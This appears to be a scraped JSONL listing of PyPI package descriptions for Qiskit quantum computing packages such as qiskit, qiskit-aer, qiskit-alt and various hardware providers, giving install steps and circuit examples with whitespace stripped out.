"qiskit", "pacakge-description": "QiskitQiskitis an open-source SDK for working with quantum computers at the level of extended quantum circuits, operators, and primitives.This library is the core component of Qiskit, which contains the building blocks for creating and working with quantum circuits, quantum operators, and primitive functions (sampler and estimator).\nIt also contains a transpiler that supports optimizing quantum circuits and a quantum information toolbox for creating advanced quantum operators.For more details on how to use Qiskit, refer to the documentation located here:https://docs.quantum.ibm.com/InstallationWe encourage installing Qiskit viapip:pipinstallqiskitPip will handle all dependencies automatically and you will always install the latest (and well-tested) version.To install from source, follow the instructions in thedocumentation.Create your first quantum program in QiskitNow that Qiskit is installed, it's time to begin working with Qiskit. The essential parts of a quantum program are:Define and build a quantum circuit that represents the quantum stateDefine the classical output by measurements or a set of observable operatorsDepending on the output, use the primitive functionsamplerto sample outcomes or theestimatorto estimate values.Create an example quantum circuit using theQuantumCircuitclass:importnumpyasnpfromqiskitimportQuantumCircuit# 1. A quantum circuit for preparing the quantum state |000> + i |111>qc_example=QuantumCircuit(3)qc_example.h(0)# generate superpostionqc_example.p(np.pi/2,0)# add quantum phaseqc_example.cx(0,1)# 0th-qubit-Controlled-NOT gate on 1st qubitqc_example.cx(0,2)# 0th-qubit-Controlled-NOT gate on 2nd qubitThis simple example makes an entangled state known as aGHZ state$(|000\\rangle + i|111\\rangle)/\\sqrt{2}$. It uses the standard quantum gates: Hadamard gate (h), Phase gate (p), and CNOT gate (cx).Once you've made your first quantum circuit, choose which primitive function you will use. Starting withsampler,\nwe usemeasure_all(inplace=False)to get a copy of the circuit in which all the qubits are measured:# 2. Add the classical output in the form of measurement of all qubitsqc_measured=qc_example.measure_all(inplace=False)# 3. Execute using the Sampler primitivefromqiskit.primitives.samplerimportSamplersampler=Sampler()job=sampler.run(qc_measured,shots=1000)result=job.result()print(f\" > Quasi probability distribution:{result.quasi_dists}\")Running this will give an outcome similar to{0: 0.497, 7: 0.503}which is00050% of the time and11150% of the time up to statistical fluctuations.\nTo illustrate the power of Estimator, we now use the quantum information toolbox to create the operator $XXY+XYX+YXX-YYY$ and pass it to therun()function, along with our quantum circuit. Note the Estimator requires a circuitwithoutmeasurement, so we use theqc_examplecircuit we created earlier.# 2. define the observable to be measuredfromqiskit.quantum_infoimportSparsePauliOpoperator=SparsePauliOp.from_list([(\"XXY\",1),(\"XYX\",1),(\"YXX\",1),(\"YYY\",-1)])# 3. Execute using the Estimator primitivefromqiskit.primitivesimportEstimatorestimator=Estimator()job=estimator.run(qc_example,operator,shots=1000)result=job.result()print(f\" > Expectation values:{result.values}\")Running this will give the outcome4. For fun, try to assign a value of +/- 1 to each single-qubit operator X and Y\nand see if you can achieve this outcome. (Spoiler alert: this is not possible!)Using the Qiskit-providedqiskit.primitives.Samplerandqiskit.primitives.Estimatorwill not take you very far. The power of quantum computing cannot be simulated\non classical computers and you need to use real quantum hardware to scale to larger quantum circuits. However, running a quantum\ncircuit on hardware requires rewriting them to the basis gates and connectivity of the quantum hardware.\nThe tool that does this is thetranspilerand Qiskit includes transpiler passes for synthesis, optimization, mapping, and scheduling. However, it also includes a\ndefault compiler which works very well in most examples. The following code will map the example circuit to thebasis_gates = ['cz', 'sx', 'rz']and a linear chain of qubits $0 \\rightarrow 1 \\rightarrow 2$ with thecoupling_map =[[0, 1], [1, 2]].fromqiskitimporttranspileqc_transpiled=transpile(qc_example,basis_gates=['cz','sx','rz'],coupling_map=[[0,1],[1,2]],optimization_level=3)Executing your code on real quantum hardwareQiskit provides an abstraction layer that lets users run quantum circuits on hardware from any vendor that provides a compatible interface.\nThe best way to use Qiskit is with a runtime environment that provides optimized implementations ofsamplerandestimatorfor a given hardware platform. This runtime may involve using pre- and post-processing, such as optimized transpiler passes with error suppression, error mitigation, and, eventually, error correction built in. A runtime implementsqiskit.primitives.BaseSamplerandqiskit.primitives.BaseEstimatorinterfaces. For example,\nsome packages that provide implementations of a runtime primitive implementation are:https://github.com/Qiskit/qiskit-ibm-runtimeQiskit also provides a lower-level abstract interface for describing quantum backends. This interface, located inqiskit.providers, defines an abstractBackendV2class that providers can implement to represent their\nhardware or simulators to Qiskit. The backend class includes a common interface for executing circuits on the backends; however, in this interface each provider may perform different types of pre- and post-processing and return outcomes that are vendor-defined. Some examples of published provider packages that interface with real hardware are:https://github.com/Qiskit/qiskit-ibm-providerhttps://github.com/qiskit-community/qiskit-ionqhttps://github.com/qiskit-community/qiskit-aqt-providerhttps://github.com/qiskit-community/qiskit-braket-providerhttps://github.com/qiskit-community/qiskit-quantinuum-providerhttps://github.com/rigetti/qiskit-rigettiYou can refer to the documentation of these packages for further instructions\non how to get access and use these systems.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines. By participating, you are expected to uphold ourcode of conduct.We useGitHub issuesfor tracking requests and bugs. Pleasejoin the Qiskit Slack communityfor discussion, comments, and questions.\nFor questions related to running or using Qiskit,Stack Overflow has aqiskit.\nFor questions on quantum computing with Qiskit, use theqiskittag in theQuantum Computing Stack Exchange(please, read first theguidelines on how to askin that forum).Authors and CitationQiskit is the work ofmany peoplewho contribute\nto the project at different levels. If you use Qiskit, please cite as per the includedBibTeX file.Changelog and Release NotesThe changelog for a particular release is dynamically generated and gets\nwritten to the release page on Github for each release. For example, you can\nfind the page for the0.46.0release here:https://github.com/Qiskit/qiskit/releases/tag/0.46.0The changelog for the current release can be found in the releases tab:The changelog provides a quick overview of notable changes for a given\nrelease.Additionally, as part of each release, detailed release notes are written to\ndocument in detail what has changed as part of a release. This includes any\ndocumentation on potential breaking changes on upgrade and new features. Seeall release notes here.AcknowledgementsWe acknowledge partial support for Qiskit development from the DOE Office of Science National Quantum Information Science Research Centers, Co-design Center for Quantum Advantage (C2QA) under contract number DE-SC0012704.LicenseApache License 2.0"} +{"package": "qiskit2quafu", "pacakge-description": "IntroductionThis package converts the circuit of qiskit into a circuit supported by quafu.\nThe converted circuit can be input to the cloud platform for processing.\nTo upload the task, refer tohttps://scq-cloud.github.io/In addition, it also supports Hamilton measurement and Variational optimizationTurtorialThe package provides different examples that cover various functions within the package\nThe example is located in the tutorial folder:FileFunctionqiskit2quafu.ipynbQuafu circuit conversion functionhamiltonTest.ipynbHamilton measurementhamiltonOptimization.ipynbHamilton variational optimization"} +{"package": "qiskit-addon-jku", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qiskit-aer", "pacakge-description": "Aer - high performance quantum circuit simulation for QiskitAeris a high performance simulator for quantum circuits written in Qiskit, that includes realistic noise models.InstallationWe encourage installing Aer via the pip tool (a python package manager):pipinstallqiskit-aerPip will handle all dependencies automatically for us, and you will always install the latest (and well-tested) version.To install from source, follow the instructions in thecontribution guidelines.Installing GPU supportIn order to install and run the GPU supported simulators on Linux, you need CUDA\u00ae 11.2 or newer previously installed.\nCUDA\u00ae itself would require a set of specific GPU drivers. Please follow CUDA\u00ae installation procedure in the NVIDIA\u00aeweb.If you want to install our GPU supported simulators, you have to install this other package:pipinstallqiskit-aer-gpuThe package above is for CUDA® 12, so if your system has CUDA\u00ae 11 installed, install separate package:pipinstallqiskit-aer-gpu-cu11This will overwrite your currentqiskit-aerpackage installation giving you\nthe same functionality found in the canonicalqiskit-aerpackage, plus the\nability to run the GPU supported simulators: statevector, density matrix, and unitary.Note: This package is only available on x86_64 Linux. For other platforms\nthat have CUDA support, you will have to build from source. You can refer to\nthecontributing guidefor instructions on doing this.Simulating your first Qiskit circuit with AerNow that you have Aer installed, you can start simulating quantum circuits with noise. Here is a basic example:$ pythonimportqiskitfromqiskit_aerimportAerSimulatorfromqiskit_ibm_runtimeimportQiskitRuntimeService# Generate 3-qubit GHZ statecirc=qiskit.QuantumCircuit(3)circ.h(0)circ.cx(0,1)circ.cx(1,2)circ.measure_all()# Construct an ideal simulatoraersim=AerSimulator()# Perform an ideal simulationresult_ideal=aersim.run(circ).result()counts_ideal=result_ideal.get_counts(0)print('Counts(ideal):',counts_ideal)# Counts(ideal): {'000': 493, '111': 531}# Construct a simulator using a noise model# from a real backend.provider=QiskitRuntimeService()backend=provider.get_backend(\"ibm_kyoto\")aersim_backend=AerSimulator.from_backend(backend)# Perform noisy simulationresult_noise=aersim_backend.run(circ).result()counts_noise=result_noise.get_counts(0)print('Counts(noise):',counts_noise)# Counts(noise): {'101': 16, '110': 48, '100': 7, '001': 31, '010': 7, '000': 464, '011': 15, '111': 436}Contribution GuidelinesIf you'd like to contribute to Aer, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use thelink. For questions that are more suited for a forum, we use the Qiskit tag in theStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from theAer documentation.Authors and CitationAer is the work ofmany peoplewho contribute to the project at different levels.\nIf you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0"} +{"package": "qiskit-aer-gpu", "pacakge-description": "Aer - high performance quantum circuit simulation for QiskitAeris a high performance simulator for quantum circuits written in Qiskit, that includes realistic noise models.InstallationWe encourage installing Aer via the pip tool (a python package manager):pipinstallqiskit-aerPip will handle all dependencies automatically for us, and you will always install the latest (and well-tested) version.To install from source, follow the instructions in thecontribution guidelines.Installing GPU supportIn order to install and run the GPU supported simulators on Linux, you need CUDA\u00ae 11.2 or newer previously installed.\nCUDA\u00ae itself would require a set of specific GPU drivers. Please follow CUDA\u00ae installation procedure in the NVIDIA\u00aeweb.If you want to install our GPU supported simulators, you have to install this other package:pipinstallqiskit-aer-gpuThe package above is for CUDA® 12, so if your system has CUDA\u00ae 11 installed, install separate package:pipinstallqiskit-aer-gpu-cu11This will overwrite your currentqiskit-aerpackage installation giving you\nthe same functionality found in the canonicalqiskit-aerpackage, plus the\nability to run the GPU supported simulators: statevector, density matrix, and unitary.Note: This package is only available on x86_64 Linux. For other platforms\nthat have CUDA support, you will have to build from source. You can refer to\nthecontributing guidefor instructions on doing this.Simulating your first Qiskit circuit with AerNow that you have Aer installed, you can start simulating quantum circuits with noise. Here is a basic example:$ pythonimportqiskitfromqiskit_aerimportAerSimulatorfromqiskit_ibm_runtimeimportQiskitRuntimeService# Generate 3-qubit GHZ statecirc=qiskit.QuantumCircuit(3)circ.h(0)circ.cx(0,1)circ.cx(1,2)circ.measure_all()# Construct an ideal simulatoraersim=AerSimulator()# Perform an ideal simulationresult_ideal=aersim.run(circ).result()counts_ideal=result_ideal.get_counts(0)print('Counts(ideal):',counts_ideal)# Counts(ideal): {'000': 493, '111': 531}# Construct a simulator using a noise model# from a real backend.provider=QiskitRuntimeService()backend=provider.get_backend(\"ibm_kyoto\")aersim_backend=AerSimulator.from_backend(backend)# Perform noisy simulationresult_noise=aersim_backend.run(circ).result()counts_noise=result_noise.get_counts(0)print('Counts(noise):',counts_noise)# Counts(noise): {'101': 16, '110': 48, '100': 7, '001': 31, '010': 7, '000': 464, '011': 15, '111': 436}Contribution GuidelinesIf you'd like to contribute to Aer, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use thelink. For questions that are more suited for a forum, we use the Qiskit tag in theStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from theAer documentation.Authors and CitationAer is the work ofmany peoplewho contribute to the project at different levels.\nIf you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0"} +{"package": "qiskit-aer-gpu-cu11", "pacakge-description": "Aer - high performance quantum circuit simulation for QiskitAeris a high performance simulator for quantum circuits written in Qiskit, that includes realistic noise models.InstallationWe encourage installing Aer via the pip tool (a python package manager):pipinstallqiskit-aerPip will handle all dependencies automatically for us, and you will always install the latest (and well-tested) version.To install from source, follow the instructions in thecontribution guidelines.Installing GPU supportIn order to install and run the GPU supported simulators on Linux, you need CUDA\u00ae 11.2 or newer previously installed.\nCUDA\u00ae itself would require a set of specific GPU drivers. Please follow CUDA\u00ae installation procedure in the NVIDIA\u00aeweb.If you want to install our GPU supported simulators, you have to install this other package:pipinstallqiskit-aer-gpuThe package above is for CUDA® 12, so if your system has CUDA\u00ae 11 installed, install separate package:pipinstallqiskit-aer-gpu-cu11This will overwrite your currentqiskit-aerpackage installation giving you\nthe same functionality found in the canonicalqiskit-aerpackage, plus the\nability to run the GPU supported simulators: statevector, density matrix, and unitary.Note: This package is only available on x86_64 Linux. For other platforms\nthat have CUDA support, you will have to build from source. You can refer to\nthecontributing guidefor instructions on doing this.Simulating your first Qiskit circuit with AerNow that you have Aer installed, you can start simulating quantum circuits with noise. Here is a basic example:$ pythonimportqiskitfromqiskit_aerimportAerSimulatorfromqiskit_ibm_runtimeimportQiskitRuntimeService# Generate 3-qubit GHZ statecirc=qiskit.QuantumCircuit(3)circ.h(0)circ.cx(0,1)circ.cx(1,2)circ.measure_all()# Construct an ideal simulatoraersim=AerSimulator()# Perform an ideal simulationresult_ideal=aersim.run(circ).result()counts_ideal=result_ideal.get_counts(0)print('Counts(ideal):',counts_ideal)# Counts(ideal): {'000': 493, '111': 531}# Construct a simulator using a noise model# from a real backend.provider=QiskitRuntimeService()backend=provider.get_backend(\"ibm_kyoto\")aersim_backend=AerSimulator.from_backend(backend)# Perform noisy simulationresult_noise=aersim_backend.run(circ).result()counts_noise=result_noise.get_counts(0)print('Counts(noise):',counts_noise)# Counts(noise): {'101': 16, '110': 48, '100': 7, '001': 31, '010': 7, '000': 464, '011': 15, '111': 436}Contribution GuidelinesIf you'd like to contribute to Aer, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use thelink. For questions that are more suited for a forum, we use the Qiskit tag in theStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from theAer documentation.Authors and CitationAer is the work ofmany peoplewho contribute to the project at different levels.\nIf you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0"} +{"package": "qiskit-algorithms", "pacakge-description": "Qiskit AlgorithmsInstallationWe encourage installing Qiskit Algorithms via the pip tool (a python package manager).pipinstallqiskit-algorithmspipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Algorithms, then you can install from source.\nTo do this follow the instructions in thedocumentation.Optional InstallsSome optimization algorithms require specific libraries to be run:Scikit-quant, may be installed using the commandpip install scikit-quant.SnobFit, may be installed using the commandpip install SQSnobFit.NLOpt, may be installed using the commandpip install nlopt.Contribution GuidelinesIf you'd like to contribute to Qiskit Algorithms, please take a look at ourcontribution guidelines.\nThis project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Pleasejoin the Qiskit Slack communityand for discussion and simple questions.\nFor questions that are more suited for a forum, we use theQiskittag inStack Overflow.Authors and CitationQiskit Algorithms was inspired, authored and brought about by the collective work of a team of researchers.\nAlgorithms continues to grow with the help and work ofmany people, who contribute\nto the project at different levels.\nIf you use Qiskit, please cite as per the providedBibTeX file.LicenseThis project uses theApache License 2.0."} +{"package": "qiskit-alice-bob-provider", "pacakge-description": "Alice & Bob Qiskit providerThis project contains a provider that allows access toAlice & BobQPUs and emulators using\nthe Qiskit framework.Full documentationis available hereand sample notebooks using the providerare available here.InstallationYou can install the provider usingpip:pipinstallqiskit-alice-bob-providerpipwill handle installing all the python dependencies automatically and you\nwill always install the latest (and well-tested) version.Remote execution on Alice & Bob QPUs: use your API keyTo obtain an API key, pleasecontact Alice & Bob.You can initialize the Alice & Bob remote provider using your API key\nlocally with:fromqiskit_alice_bob_providerimportAliceBobRemoteProviderab=AliceBobRemoteProvider('MY_API_KEY')WhereMY_API_KEYis your API key to the Alice & Bob API.print(ab.backends())backend=ab.get_backend('EMU:1Q:LESCANNE_2020')The backend can then be used like a regular Qiskit backend:fromqiskitimportQuantumCircuit,executec=QuantumCircuit(1,2)c.initialize('+',0)c.measure_x(0,0)c.measure(0,1)job=execute(c,backend)res=job.result()print(res.get_counts())Local emulation of cat quit processorsThis project contains multiple emulators of multi cat qubit processors.fromqiskit_alice_bob_providerimportAliceBobLocalProviderfromqiskitimportQuantumCircuit,execute,transpileprovider=AliceBobLocalProvider()print(provider.backends())# EMU:6Q:PHYSICAL_CATS, EMU:40Q:PHYSICAL_CATS, EMU:1Q:LESCANNE_2020TheEMU:nQ:PHYSICAL_CATSbackends are theoretical models of quantum processors made\nup of physical cat qubits.\nThey can be used to study the properties of error correction codes implemented\nwith physical cat qubits, for different hardware performance levels\n(see the parameters of classPhysicalCatProcessor).TheEMU:1Q:LESCANNE_2020backend is an interpolated model simulating the processor\nused in theseminal paperby Rapha\u00ebl\nLescanne in 2020.\nThis interpolated model is configured to act as a digital twin of the cat qubit\nused in this paper.\nIt does not represent the current performance of Alice & Bob's cat qubits.The example below schedules and simulates a Bell state preparation circuit on\naEMU:6Q:PHYSICAL_CATSprocessor, for different values of parametersaverage_nb_photonsandkappa_2.fromqiskit_alice_bob_providerimportAliceBobLocalProviderfromqiskitimportQuantumCircuit,execute,transpileprovider=AliceBobLocalProvider()circ=QuantumCircuit(2,2)circ.initialize('0+')circ.cx(0,1)circ.measure(0,0)circ.measure(1,1)# Default 6-qubit QPU with the ratio of memory dissipation rates set to# k1/k2=1e-5 and cat size, average_nb_photons, set to 16.backend=provider.get_backend('EMU:6Q:PHYSICAL_CATS')print(transpile(circ,backend).draw())# *Displays a timed and scheduled circuit*print(execute(circ,backend,shots=100000).result().get_counts())# {'11': 49823, '00': 50177}# Changing the cat size from 16 (default) to 4 and k1/k2 to 1e-2.backend=provider.get_backend('EMU:6Q:PHYSICAL_CATS',average_nb_photons=4,kappa_2=1e4)print(execute(circ,backend,shots=100000).result().get_counts())# {'01': 557, '11': 49422, '10': 596, '00': 49425}"} +{"package": "qiskit-alt", "pacakge-description": "qiskit_altqiskit_altThis Python package uses a backend written in Julia to implement high performance features for\nstandard Qiskit. This package is a proof of concept with little high-level code.Installing and managing Julia and its packages is automated. So you don't need to learn anything about Julia\nto get started.Table of contentsInstallation and configuration notesCompilationCompiling a system image to eliminate compilation at run time.Using qiskit_altFirst steps.Manual StepsDetails of automatic installation.IntroductionMotivationsDemonstrationZapata demo of Jordan-Wigner transformation in Julia; The\nsame thing as the main demonstration in qiskit_alt.Julia PackagesJulia packages that qiskit_alt depends on.TroubleshootingDevelopment. Instructions for developing qiskit_alt.Installation and Configuration NotesBasicqiskit_altis available on pypishell>pipinstallqiskit_altComplete installation by runningimportqiskit_altqiskit_alt.project.ensure_init()Seejulia_projectfor more options.If no Julia executable is found,jill.pywill be used to download and install it. It isnotnecessary\nto add the installation path or symlink path to your search PATH to use julia from qiskit_alt.\nBefore offering to install Julia,qiskit_altwill search for julia asdescribed here.The Julia packages are installed the first time you runqiskit_alt.project.ensure_init()from Python. If this fails,\nsee the log file qiskit_alt.log. You can open a bug report in theqiskit_altrepoCheck that the installation is not completely broken by running benchmark scripts, with the string \"alt\" in the name:python./bench/run_all_bench.pyNote that the folderbenchis not included when you install viapip install qiskit_alt.\nBut it can bedownloaded here.More installation detailsqiskit_altdepends onpyjuliaand/orjuliacallfor communication between Julia and Python.pyjuliaandjuliacallare two packages for communication between Python and Julia. You only need\nto import one of them. But, you won't import them directly.When you initialize withqiskit_alt.project.ensure_init()the default communication package is chosen.\nYou can also choose explicitly withqiskit_alt.project.ensure_init(calljula=\"pyjulia\")orqiskit_alt.project.ensure_init(calljula=\"juliacall\")The installation is interactive. How to do a non-interactive installation with environment variables is\ndescribed below.You may allowqiskit_altto download and install Julia for you, usingjill.py.\nOtherwise you can follow instructions forinstalling Julia with an installation tool.We recommend using a virtual Python environment withvenvorconda. For examplepython -m venv ./env,\nwhich creates a virtual environment for python packages needed to runqiskit_alt.\nYou can use whatever name you like in place of the directory./env.Activate the environment using the file required for your shell. For examplesource ./env/bin/activateforvenvand bash.Installqiskit_altwithpip install qiskit_alt.Install whatever other packages you want. For examplepip install ipython.Configuring installation with environment variables. If you set these environment variables, you will not be prompted\nduring installation.SetQISKIT_ALT_JULIA_PATHto the path to a Julia executable (in a Julia installation). This variable takes\nprecedence over other methods of specifying the path to the executable.SetQISKIT_ALT_INSTALL_JULIAtoyornto confirm or disallow installing julia viajill.py.SetQISKIT_ALT_COMPILEtoyornto confirm or disallow compiling a system image after installing Julia packagesSetQISKIT_ALT_DEPOTtoyornto force using or not using a Julia \"depot\" specific to this project.qiskit_alt.project.update()will deleteManifest.tomlfiles; upgrade packages; rebuild the manifest; delete compiled system images.\nIf you callupdate()while running a compiled system image, you should exit Python and start again before compilingqiskit_alt.projectis an instance ofJuliaProjectfrom the packagejulia_project.\nfor managing Julia dependencies in Python projects. See more options atjulia_project.CompilationWe highly recommend compiling a system image forqiskit_altto speed up loading and reduce delays due to just-in-time compilation.\nYou will be prompted to install when installing or upgrading. Compilation may also be done at any time as follows.[1]:importqiskit_altIn[2]:qiskit_alt.project.ensure_init(use_sys_image=False)In[3]:qiskit_alt.project.compile()Compilation takes about four minutes. The new Julia system image will be found the next time you importqiskit_alt.\nNote that we disabled possibly loading a previously-compiled system image before compiling a new one.\nThis avoids some possible stability issues.Using qiskit_altThis is a very brief introduction.Thepyjuliainterface is exposed via thejuliamodule. Thejuliacallmodule is calledjuliacall.\nHowever you shouldnotdoimport juliaorimport juliacallbeforeimport qiskit_alt,\nandqiskit_alt.project.ensure_init()(orqiskit_alt.project.ensure_init(calljulia=\"pyjulia\")orjuliacallwithqiskit_alt.project.ensure_init(calljulia=\"juliacall\"))\nThis is becauseimport juliawill circumvent the facilities described above for choosing the julia executable and the\ncompiled system image.Julia modules are loaded like this. Note thatqiskit_alt.project.juliapoints to eitherjuliaorjuliacalldepending\non which was chosen.importqiskit_altqiskit_alt.project.ensure_init(calljulia=interface_choice)Main=qiskit_alt.project.julia.Mainimport qiskit_alt;import julia;from julia import PkgName.\nAfter this, all functions and symbols inPkgNameare available.\nYou can do, for exampleIn[1]:importqiskit_altIn[2]:qiskit_alt.project.ensure_init()In[3]:julia=qiskit_alt.project.juliaIn[4]:julia.Main.cosd(90)Out[4]:0.0In[5]:QuantumOps=qiskit_alt.project.simple_import(\"QuantumOps\")In[6]:pauli_sum=QuantumOps.rand_op_sum(QuantumOps.Pauli,3,4);pauli_sumOut[6]:In the last example above,PauliSumis a Julia object. ThePauliSumcan be converted to\na QiskitSparsePauliOplike this.In[7]:fromqiskit_alt.pauli_operatorsimportPauliSum_to_SparsePauliOpIn[8]:PauliSum_to_SparsePauliOp(pauli_sum)Out[8]:SparsePauliOp(['ZII','IYX','XIY','ZIZ'],coeffs=[1.+0.j,1.+0.j,1.+0.j,1.+0.j])IntroductionThe highlights thus far are inbenchmark code, which is\npresented in the demonstration notebooks.\nThere is onedemonstration notebook usingpyjuliaand anotherdemonstration notebook usingjuliacall.The main application-level demonstration is computing a qubit Hamiltonian as aqiskit.quantum_info.SparsePauliOpfrom a Python list specifiying the molecule geometry in the same format as that used byqiskit_nature.The Jordan-Wigner transform in qiskit_alt is 30 or so times faster than in qiskit-nature.Computing a Fermionic Hamiltonian from pyscf integrals is several times faster, with the factor increasing\nwith the problem size.Converting an operator from the computational basis, as a numpy matrix, to the Pauli basis, as aqiskit.quantum_info.SparsePauliOp,\nis many times faster with the factor increasing rapidly in the number of qubits.You might want to skip toinstallation instructionsDemonstrationThere are a few demos in thisdemonstration benchmark notebookThebenchmark codeis a good place to get an idea of what qiskit_alt can do.Here aresome demonstration notebooksof the Julia packages behindqiskit_alt.Zapata demo of Jordan-Wigner transformation in Julia; The\nsame thing as the main demonstration in qiskit_alt. This is from JuliaCon 2020.Managing Julia packagesAvailable Julia modules are those in the standard library and those listed inProject.toml.\nYou can add more packages (and record them inProject.toml) by doingqiskit_alt.project.julia.Pkg.add(\"PackageName\").\nYou can also do the same by avoiding Python and using the julia cli.Julia PackagesThe Julia reposQuantumOps.jlandElectronicStructure.jlandQiskitQuantumInfo.jlare not registered in the General Registry, but rather inQuantumRegistrywhich contains just\na handful of packages for this project.TestingThe test folder is mostly out of date.Testing installation with dockerSeethe readme."} +{"package": "qiskit-aqt-provider", "pacakge-description": "Qiskit AQT ProviderQiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This project contains a provider that allows access toAQTion-trap quantum computing\nsystems.UsageSee thedocumentationand theexamples."} +{"package": "qiskit-aqt-provider-internal", "pacakge-description": "Qiskit AQT ProviderQiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This project contains a provider that allows access toAQTion-trap quantum computing\nsystems.UsageSee theuser guideand theexamples.LicenseApache License 2.0"} +{"package": "qiskit-aqt-provider-rc", "pacakge-description": "Qiskit AQT ProviderQiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This project contains a provider that allows access toAQTion-trap quantum computing\nsystems.UsageSee theuser guideand theexamples."} +{"package": "qiskit-aqua", "pacakge-description": "Qiskit Aquais an extensible,\nmodular, open-source library of quantum computing algorithms.\nResearchers can experiment with Aqua algorithms, on near-term quantum devices and simulators,\nand can also get involved by contributing new algorithms and algorithm-supporting objects,\nsuch as optimizers and variational forms.\nQiskit Aqua also contains application domain support in the form of the chemistry, finance,\nmachine learning and optimization modules to experiment with real-world applications to quantum computing."} +{"package": "qiskit-aqua-interfaces", "pacakge-description": "Qiskit Aqua Interfaces, a set of user-interface components forQiskit Aqua."} +{"package": "qiskit-aws-braket-provider", "pacakge-description": "IBM's qiskit provider for AWS Braket (qiskit-aws-braket-provider)Attention: this is a work-in-progess implementation.What this means: it basically works. But:edge cases are not coveredeven broad cases aren't entirely covered!!in code documentation is not threno usage or API documentation existsCI/CD is not setupSo: use at your own risk.ContributingWe welcome contributions - simply fork the repository of this plugin, and then make a pull request containing your contribution. All contributers to this plugin will be listed as authors on the releases.We also encourage bug reports, suggestions for new features and enhancements!AuthorsCarsten BlankSupportSource Code:https://github.com/carstenblank/qiskit-aws-braket-providerIssue Tracker:https://github.com/carstenblank/qiskit-aws-braket-provider/issuesIf you are having issues, please let us know by posting the issue on our Github issue tracker.LicenseThe qiskit-aws-braket-provider is free and open source, released under the Apache License, Version 2.0."} +{"package": "qiskit-bip-mapper", "pacakge-description": "Qiskit BIPMapping PluginThis repository contains a standalone routing stage to use theBIPMappingrouting pass. The BIP mapping pass solves theroutingandlayoutproblems as a binary integer programming (BIP) problem. The algorithm used\nin this pass is described in:G. Nannicini et al. \"Optimal qubit assignment and routing via integer programming.\"arXiv:2106.06446This plugin depends onCPLEXto solve the BIP problem. While a no-cost version of CPLEX is available (and published onPyPI) this has limits set on the size of the problems\nit can solve which prevents it from being used except for very small quantum circuits. If\nyou would like to use this transpiler pass for larger circuits a CPLEX license will be\nrequired.Install and Use pluginTo use the unitary synthesis plugin first install qiskit terra with the pull\nrequest:pipinstallqiskit-bip-mapperTo install the plugin package. As part of the install processpipwill install\nthe no-cost version of CPLEX from PyPI automatically. However, if you're going to\nuse the qiskit-bip-mapper plugin for runningtranspile()on circuits more than\na couple qubits or with more than handful of 2 qubit gates you will likely need\nto install the commercial version of CPLEX.Using BIPMapping passOnce you have the plugin package installed you can use the plugin via therouting_method=\"bip\"argument on Qiskit'stranspile()function. For example,\nif you wanted to use theBIPMappingmethod to compile a 15 qubit quantum\nvolume circuit for a backend you would do something like:fromqiskitimporttranspilefromqiskit.circuit.libraryimportQuantumVolumefromqiskit.providers.fake_providerimportFakePragueqc=QuantumVolume(15)qc.measure_all()backend=FakePrague()transpile(qc,backend,routing_method=\"bip\")Authors and CitationThe qiskit-bip-mapper is the work ofmany peoplewho contribute to the project at different levels. Additionally, the plugin was\noriginally developed as part of the Qiskit project itself and you can see the\ndevelopment history for it here:https://github.com/Qiskit/qiskit-terra/commits/0.23.3/qiskit/transpiler/passes/routing/bip_mapping.pyhttps://github.com/Qiskit/qiskit-terra/commits/0.23.3/qiskit/transpiler/passes/routing/algorithms/bip_model.pyIf you useqiskit-bip-mapperin your research, please cite our paper as per the includedBibTeX filefile."} +{"package": "qiskit-braket-provider", "pacakge-description": "Qiskit-Braket providerQiskit-Braket provider to execute Qiskit programs on AWS quantum computing hardware devices through Amazon Braket.Table of ContentsFor UsersInstallationQuickstart GuideTutorialsHow-TosHow to Give FeedbackContribution GuidelinesReferences and AcknowledgementsLicenseFor Developers/ContributorsContribution GuideHow to Give FeedbackWe encourage your feedback! You can share your thoughts with us by:Opening an issuein the repositoryContribution GuidelinesFor information on how to contribute to this project, please take a look at ourcontribution guidelines.References and Acknowledgements[1] Qiskithttps://www.ibm.com/quantum/qiskit[2] Amazon Braket Python SDKhttps://github.com/aws/amazon-braket-sdk-pythonLicenseApache License 2.0"} +{"package": "qiskit-chemistry", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qiskit-classroom", "pacakge-description": "Qiskit-ClassroomQiskit-classroom is a toolkit that helps implement quantum algorithms by converting and visualizing different expressions used in the Qiskit ecosystem using Qiskit-classroom-converter. The following three transformations are supportedQuantum Circuit to Dirac notationQuantum Circuit to MatrixMatrix to Quantum CircuitGetting StartedPrerequisitesLaTeX's distribution(or program) must be installedOn GNU/Linux recommend TeX LiveOn Windows recommend MiKTeXgit should be installedpython must be installed (3.9 <= X <= 3.11)Qt6(>= 6.0.x) must be installedInstall with Flatpak (GNU/Linux)We're currently packaging flatpak package. please wait for a couple of daysInstall with PyPi (Windows, macOS)pip install qiskit-classroomwarningApple Silicon Processor not supported read this articleyou must install latex distribution(program).How to debug# download packagegithttps://github.com/KMU-quantum-classrooom/qiksit-classroom.git# install python packagescdqiskit-classroom\npipinstall-rrequirements.txt# run scriptspython-mmain.pyScreenShotsmain 